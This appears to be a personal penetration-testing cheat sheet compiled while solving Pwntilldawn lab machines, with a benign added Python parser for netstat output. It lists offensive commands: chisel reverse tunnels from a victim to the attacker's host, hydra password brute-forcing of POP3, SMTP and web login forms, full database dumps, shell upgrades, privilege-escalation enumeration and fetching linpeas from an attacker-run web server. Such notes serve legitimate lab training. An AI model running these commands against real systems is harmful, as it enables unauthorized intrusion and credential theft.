
by Anthony Guilbert, 1 month ago


Pwntilldawn Mindmap FULL

When carrying out cybersecurity tasks such as penetration testing, knowing the relevant techniques and tools is critical. Essential methods include pivoting and tunneling, where one reaches otherwise unreachable parts of a network using tools such as SSH tunneling and port forwarding.


Pwntilldawn FULL

Mindmap I made while working through some Pwntilldawn boxes

Pivoting / Tunneling

Tunneling & Port Forwarding
If we have SSH access

sshuttle -r user@ip -N

Web service listening on localhost

On the victim

./chisel client ip_host:7777 R:8080:127.0.0.1:8080

Don't forget to adapt port 8080 to the situation

On the host

chisel server -port 7777 --reverse

Check what is listening on localhost
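Added example, not part of the mindmap: a small Python parser for `netstat -antup` output that lists the sockets bound only to a loopback address. That is exactly what the "check what is listening on localhost" step is after, and it is the set of services a reverse tunnel like the chisel remote above would expose, so a defender auditing a host wants the same list. The sample netstat output is constructed.

```python
import ipaddress
from dataclasses import dataclass

# Constructed sample of `netstat -antup` output (not captured from a real host).
SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      1234/python3
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      800/sshd
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      900/mysqld
tcp6       0      0 :::80                   :::*                    LISTEN      950/apache2
tcp6       0      0 ::1:6379                :::*                    LISTEN      970/redis-server
udp        0      0 127.0.0.1:53            0.0.0.0:*                           600/systemd-resolve
tcp        0      0 10.150.150.57:22        10.150.150.5:51234      ESTABLISHED 1300/sshd
"""

@dataclass(frozen=True)
class Listener:
    proto: str
    host: str
    port: int
    program: str

def parse_listeners(output: str) -> list[Listener]:
    """Return every bound socket in `netstat -antup` output. TCP rows carry a State
    column and only LISTEN rows are services; UDP rows have no State column at all."""
    found = []
    for line in output.splitlines():
        f = line.split()
        if len(f) < 6 or not f[0].startswith(("tcp", "udp")):
            continue  # header lines, not socket rows
        if f[0].startswith("tcp") and (len(f) < 7 or f[5] != "LISTEN"):
            continue  # established/closing TCP sockets are not services
        host, port = f[3].rsplit(":", 1)  # works for '127.0.0.1:8080' and ':::80'
        found.append(Listener(f[0], host, int(port), f[-1]))
    return found

def loopback_only(listeners: list[Listener]) -> list[Listener]:
    """Keep sockets bound to 127.0.0.0/8 or ::1: invisible from the network, but
    reachable once a tunnel such as the chisel remote above is in place."""
    kept = []
    for l in listeners:
        try:
            if ipaddress.ip_address(l.host).is_loopback:
                kept.append(l)
        except ValueError:
            pass  # a bare '*' in some netstat builds: not a loopback bind
    return kept
```

Run it with `loopback_only(parse_listeners(SAMPLE_NETSTAT))`; on a real host feed it the captured output of `netstat -antup` instead.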

NMAP

nmap -sV -sC -T5 -p- ip
Nmap Automator
sudo nmap -sF -p1-100 -T4

Miscellaneous protocols

DNS
! AXFR !

dig @mortysserver.com mortysserver.com axfr

Add an entry to /etc/hosts if needed

Example: 10.150.150.57 rickscontrolpanel.mortysserver.com

SSH
Try connecting to grab the banner
Connect if we have the private key

ssh -i id_rsa user@ip

POP3
hydra -l operator -P wordlist.txt ip pop3
Mysql
mysql -h localhost -u sql_user -p
mysqldump -u root -p --all-databases > alldb.sql
FTP
Check for anonymous login
NFS
sudo mount -t nfs ip:/remote /local
showmount -e IP
sudo umount 10.150.150.59:/nfsroot
rpcinfo IP
SMTP
hydra -l operator -P wordlist.txt ip smtp

Misc

netstat -antup
Dumb shell upgrade
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
script /dev/null -qc /bin/bash
If errors are needed but not displayed (e.g. a PHP webshell)
Append "2>file" to the command

then cat the file

Finding a flag

Windows
@for /r C:\ %i in (FLAG??.txt) do @echo %i && @type "%i"
Linux
find / -type f -name 'FLAG[0-9][0-9]' 2>/dev/null
find ./* | grep FLAG3
find / -type f -name 'FLAG[0-9].txt' 2>/dev/null
find / -name FLAG6.txt 2>/dev/null

Privesc

SUID
find / -perm -u=s -type f 2>/dev/null
searchsploit
searchsploit -m path
searchsploit xxxx
Python Library Hijacking
A script running as root that imports libraries
LXC/LXD
https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation
Metasploit
Upgrade session: sessions -u
Windows
Shell

Upgrade shell

sessions -u id

ps --> migrate pid

msfconsole

post/multi/recon/local_exploit_suggester

linpeas
On the attacker: sudo python3 -m http.server port, then wget it from the target
Symbolic link
ln -s /root /home/michael/importantfiles/rootbackup

WEB

Wordpress
Bruteforce

wpscan --url url_wordpress --passwords wordlist

User enumeration

wpscan --url url --enumerate u

wpscan --url https://www.hackinprovence.fr/ -e u
Check for vulnerable themes and plugins

wpscan --url url --enumerate vp,vt

PHP Filters
python3 script.py --chain ''

https://github.com/synacktiv/phpfilterchaingenerator/blob/main/phpfilterchaingenerator.py

Enumeration
Path

Dirsearch

FeroxBuster

feroxbuster -u url -w ~/Desktop/SecLists-master/Discovery/Web-Content/common.txt --filter-status 404

feroxbuster -u http://example.com -w wordlist -x php,html,txt -v -o output.txt --filter-status 404

Bruteforce Forms
Hydra

hydra -l admin -P SecLists-master/rockyou.txt 10.150.150.38 -s 30609 -t 20 http-post-form "/jacegisecurity_check:jusername=^USER^&jpassword=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password"

hydra -l operator -P wordlist.txt 10.150.150.56

Stegano

searchsploit
Depixelize
Unredactor
Depix

python3 depix.py -p pixel_image -s images/searchimages/image.png

Stereogram
https://piellardj.github.io/stereogram-solver/
Aperisolve
Steghide
steghide extract -sf screen.jpeg